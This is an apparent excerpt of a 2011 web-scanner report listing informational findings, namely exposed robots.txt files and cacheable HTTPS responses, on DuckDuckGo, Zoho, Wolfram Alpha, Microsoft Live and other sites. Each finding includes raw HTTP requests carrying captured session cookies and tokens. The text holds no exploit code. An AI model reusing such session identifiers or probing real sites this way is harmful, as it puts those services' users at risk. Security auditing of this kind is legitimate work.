Last-Modified: Thu, 24 Feb 2011 16:48:42 GMT
ETag: "fd-49d09fc6b4e80"
Accept-Ranges: bytes
Content-Length: 253
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /input/
Disallow: /input/pod.jsp
Noindex: /input/
Noindex: /termsofuse.html
Noindex: /privacypolicy.html


User-agent: Mediapartners-Google
Disallow:

User-agent: Browsershot
...[SNIP]...

12.79. http://www4d.wolframalpha.com/Calculate/MSP/MSP485119ecg7ic1a16ifci00004c77aigbe60ad8d6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www4d.wolframalpha.com
Path:   /Calculate/MSP/MSP485119ecg7ic1a16ifci00004c77aigbe60ad8d6

Request

GET /robots.txt HTTP/1.0
Host: www4d.wolframalpha.com

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:59:12 GMT
Server: Apache
Set-Cookie: WR_SID=173.193.214.243.1298944752088016; path=/; max-age=315360000; domain=.wolframalpha.com
Last-Modified: Thu, 24 Feb 2011 16:48:42 GMT
ETag: "fd-49d09fc6b4e80"
Accept-Ranges: bytes
Content-Length: 253
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /input/
Disallow: /input/pod.jsp
Noindex: /input/
Noindex: /termsofuse.html
Noindex: /privacypolicy.html


User-agent: Mediapartners-Google
Disallow:

User-agent: Browsershot
...[SNIP]...

12.80. http://xss.cx/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xss.cx
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: xss.cx

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Sat, 26 Feb 2011 20:50:50 GMT
Accept-Ranges: bytes
ETag: "e0cb8d9f6d5cb1:0"
Server: Microsoft-IIS/7.5
X-DORK-Server: xss.cx
Date: Sun, 27 Feb 2011 15:42:48 GMT
Connection: close
Content-Length: 57

User-agent: *
Allow: /
sitemap: http://xss.cx/xss.xml

13. Cacheable HTTPS response  previous  next
There are 33 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.


13.1. https://accounts.zoho.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /login

Request

GET /login?service_language=en&dcc=true&hide_title=true&servicename=ZohoDiscussions&hide_signup=true&serviceurl=http%3A%2F%2Fduck.co HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://duck.co/portalLogin.do?serviceurl=/&forumGroupUrl=duckduckgo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680; iamcsr=17d8938e-e664-4e84-8c5d-c1bc26754003; rtk=1298947649191; JSESSIONID=BC277CF3337675932ED541A636212CD9

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:57:06 GMT
Server: ZWS
Content-Length: 20834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...

13.2. https://accounts.zoho.com/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /register

Request

GET /register?serviceurl=http%3A%2F%2Fwww.zoho.com%2F HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://www.zoho.com/company.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=7d3e82ff-ab2d-4eba-994a-a42bd8a69509; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1298948216140; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=47CD6EF4F2FBFB5A52C054FF42EDD89F; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:56:55 GMT
Server: ZWS
Content-Length: 33823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...

13.3. https://duckduckgo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /

Request

GET / HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:54:40 GMT
Content-Type: text/html
Content-Length: 5380
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Tue, 01 Mar 2011 14:54:40 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/"/><meta http-equiv="content-type" content="text
...[SNIP]...

13.4. https://duckduckgo.com/Electronic_Frontier_Foundation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /Electronic_Frontier_Foundation

Request

GET /Electronic_Frontier_Foundation HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 13038
Connection: close
Expires: Tue, 01 Mar 2011 02:56:33 GMT
Cache-Control: max-age=1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Electronic_Frontier_Foundation"/><meta http-eq
...[SNIP]...

13.5. https://duckduckgo.com/HTTP_Secure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /HTTP_Secure

Request

GET /HTTP_Secure HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 13092
Connection: close
Expires: Tue, 01 Mar 2011 02:56:33 GMT
Cache-Control: max-age=1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Secure_communication"/><meta http-equiv="conte
...[SNIP]...

13.6. https://duckduckgo.com/HTTP_cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /HTTP_cookie

Request

GET /HTTP_cookie HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 13361
Connection: close
Expires: Tue, 01 Mar 2011 02:56:33 GMT
Cache-Control: max-age=1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Internet_privacy"/><meta http-equiv="content-t
...[SNIP]...

13.7. https://duckduckgo.com/IP_Address  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /IP_Address

Request

GET /IP_Address HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9999
Connection: close
Expires: Tue, 01 Mar 2011 02:56:33 GMT
Cache-Control: max-age=1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Internet_Protocol"/><meta http-equiv="content-
...[SNIP]...

13.8. https://duckduckgo.com/about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /about.html

Request

GET /about.html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:22 GMT
Content-Type: text/html
Content-Length: 7134
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:56:22 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8;charset=utf-8"><title>About Duck
...[SNIP]...

13.9. https://duckduckgo.com/bang.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /bang.html

Request

GET /bang.html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:32 GMT
Content-Type: text/html
Content-Length: 39514
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:56:32 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="in
...[SNIP]...

13.10. https://duckduckgo.com/e.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /e.js

Request

POST /e.js HTTP/1.1
Host: duckduckgo.com
Connection: keep-alive
Referer: http://duckduckgo.com/feedback.html
Cache-Control: max-age=0
Origin: http://duckduckgo.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9
Content-Length: 731

from=h02332%40gmail.com&body=Hoyt+LLC+Research+investigates+and+reports+on+security+vulnerabilities+embedded+in+Web+Applications+and+Products+used+in+wide-scale+deployment.+%0D%0A%0D%0ADisclosure+Info
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:16:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Sun, 12 Nov 1999 20:28:05 GMT
Content-Length: 1411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...

13.11. https://duckduckgo.com/faq.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /faq.html

Request

GET /faq.html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:25 GMT
Content-Type: text/html
Content-Length: 12397
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:56:25 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="in
...[SNIP]...

13.12. https://duckduckgo.com/feedback.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /feedback.html

Request

GET /feedback.html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:32 GMT
Content-Type: text/html
Content-Length: 2674
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:56:32 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...

13.13. https://duckduckgo.com/goodies.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /goodies.html

Request

GET /goodies.html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:24 GMT
Content-Type: text/html
Content-Length: 15729
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:56:24 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="in
...[SNIP]...

13.14. https://duckduckgo.com/html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /html

Request

GET /html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:54:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Q: Status: 200 OK
Expires: Tue, 01 Mar 2011 02:54:40 GMT
Cache-Control: max-age=1
Content-Length: 1919

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <link rel="canonical" href="http://duckduckgo.com/">
   <meta http-equiv="content-type" cont
...[SNIP]...

13.15. https://duckduckgo.com/html/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /html/

Request

GET /html/ HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:55:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Q: Status: 200 OK
Expires: Tue, 01 Mar 2011 02:55:22 GMT
Cache-Control: max-age=1
Content-Length: 1919

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <link rel="canonical" href="http://duckduckgo.com/">
   <meta http-equiv="content-type" cont
...[SNIP]...

13.16. https://duckduckgo.com/lite  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /lite

Request

GET /lite HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Q: Status: 200 OK
Expires: Tue, 01 Mar 2011 02:56:20 GMT
Cache-Control: max-age=1
Content-Length: 2116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" >
<title
...[SNIP]...

13.17. https://duckduckgo.com/opensearch.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /opensearch.xml

Request

GET /opensearch.xml HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:31 GMT
Content-Type: application/xml
Content-Length: 2016
Last-Modified: Sat, 19 Feb 2011 23:19:15 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:56:31 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>DuckDuckGo</ShortName>
<Description>Search DuckDuckGo</Description>
<Inp
...[SNIP]...

13.18. https://duckduckgo.com/params.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /params.html

Request

GET /params.html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:32 GMT
Content-Type: text/html
Content-Length: 8939
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:56:32 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>DuckDuckGo URL Parameter
...[SNIP]...

13.19. https://duckduckgo.com/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /privacy.html

Request

GET /privacy.html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:55:18 GMT
Content-Type: text/html
Content-Length: 17291
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:55:18 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Duck Duck Go Privacy Policy</title>
<link rel="stylesheet" href="/s312.css" type=
...[SNIP]...

13.20. https://duckduckgo.com/settings.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /settings.html

Request

GET /settings.html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:32 GMT
Content-Type: text/html
Content-Length: 29040
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:56:32 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Duck Duck Go Settings</t
...[SNIP]...

13.21. https://event.on24.com/eventRegistration/EventLobbyServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:29:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=iHfgJT1BRhWklTE6oeAB7GuLzfGqF0xi686dmMHS57lBMaxAYxpg!1016952572; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...

13.22. https://login.live.com/pp1000/RDHelper_JS.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp1000/RDHelper_JS.srf

Request

GET /pp1000/RDHelper_JS.srf?x=10.0.17084.0&lc=1033 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MSPRequ=lt=1298834433&co=1&id=74335; MSPOK=$uuid-6278c8d3-acda-423f-b793-0efb77b580bc; CkTst=G1298834441147

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 27 Feb 2011 19:20:39 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 26 Feb 2016 19:20:39 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1K30 V: 0
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Vary: Accept-Encoding
Content-Length: 9536


<!-- ServerInfo: BAYIDSLGN1K30 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
var k_fRealmNone=0,k_fRealmAllowWLIDSignIn=1<<0,k_fRealmAllowFedSignIn=1<<1,k_fRealmConflictInactive=1<<2,k_fRealmConfl
...[SNIP]...

13.23. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

